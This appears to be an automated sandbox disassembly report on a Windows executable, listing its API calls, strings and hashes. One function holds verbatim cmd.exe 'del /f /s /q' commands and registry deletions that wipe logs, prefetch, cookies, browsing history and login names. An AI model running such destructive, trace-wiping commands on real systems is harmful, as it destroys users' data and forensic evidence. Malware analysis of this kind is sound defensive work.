                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: File$Find$Attributes$CloseDeleteDirectoryFirstNextRemove
                                • String ID: \*.*$desktop.ini$index.dat
                                • API String ID: 799748605-3685876507
                                • Opcode ID: 80584bf7c0bad225ea78bdcef72c35823c7484b3c5839c582d24ccd8dfbf2b61
                                • Instruction ID: 0650860c3c1e2d53bc6fffd3340b65124f85220920b4efda78b7a122019db1cc
                                • Opcode Fuzzy Hash: 80584bf7c0bad225ea78bdcef72c35823c7484b3c5839c582d24ccd8dfbf2b61
                                • Instruction Fuzzy Hash: D881C170104B429FD310CB24CC48BABB7A8EF85355F148A6EF855972D1EB79D809CF5A
                                Function 0045B051 Relevance: 15.1, APIs: 10, Instructions: 102stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 0045B056
                                • GetFullPathNameA.KERNEL32(?,00000104,?,?,?,?,?), ref: 0045B080
                                • lstrcpynA.KERNEL32(?,?,00000104), ref: 0045B091
                                  • Part of subcall function 0045B00F: lstrcpynA.KERNEL32(00000000,?,00000104,0045B0C3,?,?), ref: 0045B034
                                  • Part of subcall function 0045B00F: PathStripToRootA.SHLWAPI(00000000), ref: 0045B03B
                                • PathIsUNCA.SHLWAPI(?,?,?), ref: 0045B0C6
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0045B0EA
                                • CharUpperA.USER32(?), ref: 0045B102
                                • FindFirstFileA.KERNEL32(?,?), ref: 0045B11B
                                • FindClose.KERNEL32(00000000), ref: 0045B127
                                • lstrlenA.KERNEL32(?), ref: 0045B144
                                • lstrcpyA.KERNEL32(?,?), ref: 0045B163
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Path$Findlstrcpyn$CharCloseFileFirstFullH_prologInformationNameRootStripUpperVolumelstrcpylstrlen
                                • String ID:
                                • API String ID: 4080879615-0
                                • Opcode ID: deeb7901bc9a1c9402ce5623d21999b15f3dcde8d64849d450898d991a24d1a0
                                • Instruction ID: 1ff96bb8ef7605f0caa5a4dd8548b9a5efde3f4e5f2b52bc8e945bc090aef529
                                • Opcode Fuzzy Hash: deeb7901bc9a1c9402ce5623d21999b15f3dcde8d64849d450898d991a24d1a0
                                • Instruction Fuzzy Hash: 70318171500518EBCB109F64CC88AEF7B78EF4475AF0045AAF915D6251D7788D888F99
                                Function 00439D40 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 140fileCOMMON
                                Download Yara Rule
                                APIs
                                • #17.COMCTL32(?,?,?,?,?,0046429C,000000FF), ref: 00439D71
                                  • Part of subcall function 0045FE1A: InterlockedExchange.KERNEL32(004D986C,?), ref: 0045FE46
                                • __time32.LIBCMT ref: 00439D87
                                  • Part of subcall function 0044808D: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00448096
                                  • Part of subcall function 0044808D: __aulldiv.LIBCMT ref: 004480B6
                                  • Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
                                  • Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF
                                • FindFirstFileA.KERNEL32(?,?,SystemRoot,?,00000000,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,004C7468), ref: 00439E18
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: FileTime$ErrorExchangeFindFirstInterlockedLastOpenSystem__aulldiv__time32
                                • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion$SystemRoot$\system32\winbws.bat
                                • API String ID: 3390870601-281878756
                                • Opcode ID: bda4eec5377eeda0a82f4e272ea58311012ab99e9c2bf338f4d13e0b041c49af
                                • Instruction ID: 6b44aab606d6ad69af96c057710d905d5c5d9310879aa73593c03cc9d95d0a52
                                • Opcode Fuzzy Hash: bda4eec5377eeda0a82f4e272ea58311012ab99e9c2bf338f4d13e0b041c49af
                                • Instruction Fuzzy Hash: E651C2751087419FC324EF25C895BDFB7A8AF88324F004A1FF45A432D2EB789519CB5A
                                Function 0045F814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43librarystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpyA.KERNEL32(00000800,LOC), ref: 0045F837
                                • LoadLibraryA.KERNEL32(?), ref: 0045F86A
                                • GetLocaleInfoA.KERNEL32(00000800,00000003,00000800,00000004), ref: 0045F87A
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: InfoLibraryLoadLocalelstrcpy
                                • String ID: LOC
                                • API String ID: 864663389-519433814
                                • Opcode ID: e6f3c999939144e02464b0b0fc0e2b59b0546a768625dfb11b6e071e05ce9b10
                                • Instruction ID: ffcff24ee2f8decf076d347500f601e65b7776f307dd8f414f4772e04c55416e
                                • Opcode Fuzzy Hash: e6f3c999939144e02464b0b0fc0e2b59b0546a768625dfb11b6e071e05ce9b10
                                • Instruction Fuzzy Hash: 3F01A771500208ABDF14BB60EC09ADA37ACAB04365F408577FD19D6191E778DE4C8E9A
                                Function 0042E9F0 Relevance: 3.0, APIs: 2, Instructions: 38COMMON
                                Download Yara Rule
                                APIs
                                • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0042EA10
                                • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0042EA40
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: AdaptersInfo
                                • String ID:
                                • API String ID: 3177971545-0
                                • Opcode ID: 04afacd52e89466cf82da10b8b8be73c46f93b8a84a9b27f9a449f8cc33cebfb
                                • Instruction ID: 4f22e88a5df2136267b61b20a62ceb5ab55facc037de5985a683b6d03b984736
                                • Opcode Fuzzy Hash: 04afacd52e89466cf82da10b8b8be73c46f93b8a84a9b27f9a449f8cc33cebfb
                                • Instruction Fuzzy Hash: 05F0AFF1A00311EBE7149F15D805B17B7E8EB84705F00892EF889CB241E378DD48CB91
                                Function 00458C58 Relevance: 1.9, APIs: 1, Instructions: 440COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID:
                                • API String ID: 3519838083-0
                                • Opcode ID: 64f7b6f75cea90bdd9947e7a34994e041742a05b1ea9121d2e1a6fcceb2a18e3
                                • Instruction ID: 2afed94fbf52a9488442a8020d80419d6e69f24e400d4a6813f348e17fbd4380
                                • Opcode Fuzzy Hash: 64f7b6f75cea90bdd9947e7a34994e041742a05b1ea9121d2e1a6fcceb2a18e3
                                • Instruction Fuzzy Hash: 9AE17B70500215EBDB15DF15C885ABE77B9EF08316F10851AFC09AA293CB3DEE09DB69
                                Function 004057B0 Relevance: 110.5, APIs: 36, Strings: 27, Instructions: 292windowCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00404F00: _rand.LIBCMT ref: 00405041
                                  • Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1
                                • SendMessageA.USER32(?,00000401,00000000,?), ref: 00405836
                                • SendMessageA.USER32(?,00000402,00000000,00000000), ref: 00405848
                                • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00405859
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit,00000000,00000000), ref: 00405888
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 0040589A
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.gid && exit,00000000,00000000), ref: 004058B6
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 004058C8
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.log & exit,00000000,00000000), ref: 004058E4
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 004058F6
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\*.chk & exit,00000000,00000000), ref: 00405912
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405924
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit,00000000,00000000), ref: 0040594D
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU), ref: 00405959
                                  • Part of subcall function 00405630: SHGetSpecialFolderPathA.SHELL32(00000000,00000008,00000008,00000000), ref: 00405650
                                  • Part of subcall function 00405630: SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs), ref: 00405674
                                • SHDeleteValueA.SHLWAPI(80000001,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,DefaultUserName), ref: 00405971
                                • SHDeleteValueA.SHLWAPI(80000001,Software\Microsoft\Windows NT\CurrentVersion\Winlogon,AltDefaultUserName), ref: 00405986
                                • SHDeleteValueA.SHLWAPI(80000002,Software\Microsoft\Windows\CurrentVersion\Winlogon,DefaultUserName), ref: 0040599B
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU), ref: 004059AB
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU), ref: 004059B7
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU), ref: 004059C3
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Windows\CurrentVersion\Explorer\FindComputerMRU), ref: 004059CF
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ComputerNameMRU), ref: 004059DB
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 004059ED
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %windir%\prefetch\*.* & exit,00000000,00000000), ref: 00405A0D
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405A1F
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %systemdrive%\recycled\*.* & exit,00000000,00000000), ref: 00405A3F
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405A51
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit,00000000,00000000), ref: 00405A71
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405A91
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit,00000000,00000000), ref: 00405AB5
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\TypedURLs), ref: 00405AC8
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\Internet Explorer\IntelliForms), ref: 00405ADB
                                • SHDeleteKeyA.SHLWAPI(80000001,Software\Microsoft\RAS Autodial\Addresses), ref: 00405AE7
                                • SHEmptyRecycleBinA.SHELL32(00000000,00000000,00000007), ref: 00405AF6
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405B21
                                • ShellExecuteA.SHELL32(00000000,open,cmd.exe,/k del /f /s /q %windir%\$NtUninstal*.* & exit,00000000,00000000), ref: 00405B41
                                • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00405B53
                                  • Part of subcall function 00459905: ShowWindow.USER32(?,?,00455C74,00000000,0000E146,00000000,?,?,00402EB7), ref: 00459912
                                  • Part of subcall function 00456F8E: MessageBoxA.USER32(?,?,?,?), ref: 00456FB6
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU, xrefs: 004059A1
                                • /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit, xrefs: 00405AA4
                                • Software\Microsoft\Internet Explorer\TypedURLs, xrefs: 00405ABE
                                • Software\Microsoft\Internet Explorer\IntelliForms, xrefs: 00405AD1
                                • They have been cleaned successfully!, xrefs: 00405B69
                                • /k del /f /s /q %windir%\$NtUninstal*.* & exit, xrefs: 00405B30
                                • Software\Microsoft\Windows\CurrentVersion\Winlogon, xrefs: 00405991
                                • Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU, xrefs: 004059AD
                                • Software\Microsoft\RAS Autodial\Addresses, xrefs: 00405ADD
                                • cmd.exe, xrefs: 0040587C, 004058AA, 004058D8, 00405906, 00405941, 00405A01, 00405A33, 00405A65, 00405AA9, 00405B35
                                • /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit, xrefs: 00405A60
                                • Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU, xrefs: 004059B9
                                • /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit, xrefs: 0040593C
                                • /k del /f /s /q %systemdrive%\*.log & exit, xrefs: 004058D3
                                • AltDefaultUserName, xrefs: 00405977
                                • Information, xrefs: 00405B64
                                • /k del /f /s /q %windir%\prefetch\*.* & exit, xrefs: 004059FC
                                • /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit, xrefs: 00405877
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\FindComputerMRU, xrefs: 004059C5
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, xrefs: 0040594F
                                • open, xrefs: 00405881, 004058AF, 004058DD, 0040590B, 00405946, 00405A06, 00405A38, 00405A6A, 00405AAE, 00405B3A
                                • /k del /f /s /q %systemdrive%\*.chk & exit, xrefs: 00405901
                                • Software\Microsoft\Windows NT\CurrentVersion\Winlogon, xrefs: 00405967, 0040597C
                                • Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ComputerNameMRU, xrefs: 004059D1
                                • /k del /f /s /q %systemdrive%\*.gid && exit, xrefs: 004058A5
                                • DefaultUserName, xrefs: 00405962, 0040598C
                                • /k del /f /s /q %systemdrive%\recycled\*.* & exit, xrefs: 00405A2E
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: Message$DeleteSend$ExecuteShell$Value$EmptyFolderH_prologPathRecycleShowSpecialWindow_rand
                                • String ID: /k del /f /s /q %systemdrive%\*.chk & exit$/k del /f /s /q %systemdrive%\*.gid && exit$/k del /f /s /q %systemdrive%\*.log & exit$/k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit$/k del /f /s /q %systemdrive%\recycled\*.* & exit$/k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit$/k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit$/k del /f /s /q %windir%\$NtUninstal*.* & exit$/k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit$/k del /f /s /q %windir%\prefetch\*.* & exit$AltDefaultUserName$DefaultUserName$Information$Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ComputerNameMRU$Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\ContainingTextMRU$Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}\FilesNamedMRU$Software\Microsoft\Internet Explorer\IntelliForms$Software\Microsoft\Internet Explorer\TypedURLs$Software\Microsoft\RAS Autodial\Addresses$Software\Microsoft\Windows NT\CurrentVersion\Winlogon$Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU$Software\Microsoft\Windows\CurrentVersion\Explorer\FindComputerMRU$Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU$Software\Microsoft\Windows\CurrentVersion\Winlogon$They have been cleaned successfully!$cmd.exe$open
                                • API String ID: 608165374-3242249910
                                • Opcode ID: 9470b7cd3b11127832bb47f481f4ac34d4b82c993a343baa40c5a6d1fb0da4f5
                                • Instruction ID: 7915b94816bc076585abd770ead6f12c8ee0623fdfc370f13a234b32de4c556b
                                • Opcode Fuzzy Hash: 9470b7cd3b11127832bb47f481f4ac34d4b82c993a343baa40c5a6d1fb0da4f5
                                • Instruction Fuzzy Hash: 4E914B703C0B00BAF6207B619C47F6B7294EB54F06F31492EB75A7A1C1E9F878458A5E
                                Function 00402E80 Relevance: 47.6, APIs: 17, Strings: 10, Instructions: 356windowregistryCOMMON
                                Download Yara Rule
                                APIs
                                • __time64.LIBCMT ref: 00402EB9
                                  • Part of subcall function 00446DDD: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,00402EBE,00000000), ref: 00446DE6
                                  • Part of subcall function 00446DDD: __aulldiv.LIBCMT ref: 00446E06
                                  • Part of subcall function 004306A0: RegOpenKeyExA.KERNEL32(80000002,80000002,00000000,000F003F,?,?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306B5
                                  • Part of subcall function 004306A0: GetLastError.KERNEL32(?,00402ED4,80000002,SOFTWARE\Microsoft\Internet Explorer\Registration), ref: 004306BF
                                  • Part of subcall function 00456FEC: __EH_prolog.LIBCMT ref: 00456FF1
                                  • Part of subcall function 004597B2: GetDlgItem.USER32(?,?), ref: 004597BF
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00402F6D
                                  • Part of subcall function 00459941: KiUserCallbackDispatcher.NTDLL(?,?), ref: 0045994E
                                • SendMessageA.USER32(?,000000CF,00000001,00000000), ref: 00402F9D
                                • SendMessageA.USER32(?,0000014B,00000000,00000000), ref: 00402FAF
                                • SendMessageA.USER32(?,00000143,00000000,Internet Explorer 4.0), ref: 00402FC4
                                • SendMessageA.USER32(?,00000143,00000000,Internet Explorer 5.0), ref: 00402FD9
                                • SendMessageA.USER32(?,00000143,00000000,Internet Explorer 6.0), ref: 00402FEE
                                • SendMessageA.USER32(?,00000143,00000000,Internet Explorer 7.0), ref: 00403003
                                • SendMessageA.USER32(?,00000143,00000000,Internet Explorer 8.0), ref: 00403018
                                • RegOpenKeyExA.KERNEL32 ref: 00403046
                                • RegQueryValueExA.KERNEL32(?,Version,00000000,?,?,?), ref: 004030E7
                                • RegCloseKey.KERNEL32(?,80000002,?,00000000,00020019,?,SOFTWARE\Microsoft\Internet Explorer), ref: 00403124
                                • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00403166
                                • SendMessageA.USER32(?,0000014E,00000001,00000000), ref: 00403193
                                • SendMessageA.USER32(?,0000014E,00000002,00000000), ref: 004031C0
                                • SendMessageA.USER32(?,0000014E,00000003,00000000), ref: 004031ED
                                • SendMessageA.USER32(?,0000014E,00000004,00000000), ref: 0040321A
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.00000000004E7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000051D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.0000000000521000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254813346.000000000052F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_400000_ .jbxd
                                Similarity
                                • API ID: MessageSend$OpenTime$CallbackCloseDispatcherErrorFileH_prologItemLastQuerySystemUserValue__aulldiv__time64
                                • String ID: Internet Explorer 4.0$Internet Explorer 5.0$Internet Explorer 6.0$Internet Explorer 7.0$Internet Explorer 8.0$ProductId$SOFTWARE\Microsoft\Internet Explorer$SOFTWARE\Microsoft\Internet Explorer\Registration$Version$d
                                • API String ID: 3070450969-2079231466
                                • Opcode ID: 46547f3797a4cde3ff040432e23ae9be5653e7e1b86516a1e286e490f84f3ad3
                                • Instruction ID: 12bbc5be726f8242eba0e1541a654c64904454683ae404ff7ef7c215fd5e6504
                                • Opcode Fuzzy Hash: 46547f3797a4cde3ff040432e23ae9be5653e7e1b86516a1e286e490f84f3ad3
                                • Instruction Fuzzy Hash: 94D1C670204741AFE310DB28CC86F9BB7A8BF84724F108A1DF6599B2D1DB78D505CB9A
                                Function 0045F8A9 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 167registrylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0045F8CC
                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 0045F8D7
                                • ConvertDefaultLocale.KERNEL32(?), ref: 0045F908
                                • ConvertDefaultLocale.KERNEL32(?), ref: 0045F910
                                • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0045F91D
                                • ConvertDefaultLocale.KERNEL32(?), ref: 0045F937
                                • ConvertDefaultLocale.KERNEL32(000003FF), ref: 0045F93D
                                • GetVersion.KERNEL32 ref: 0045F94B
                                • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 0045F970
                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 0045F996
                                • ConvertDefaultLocale.KERNEL32(?), ref: 0045F9E2
                                • ConvertDefaultLocale.KERNEL32(76F90A60), ref: 0045F9E8
                                • RegCloseKey.ADVAPI32(?), ref: 0045F9F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.3254378058.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000005.00000002.3248452524.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254750478.0000000000465000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 00000005.00000002.3254793489.00000000004D5000.00000004.00000001.01000000.00000007.sdmpDownload File
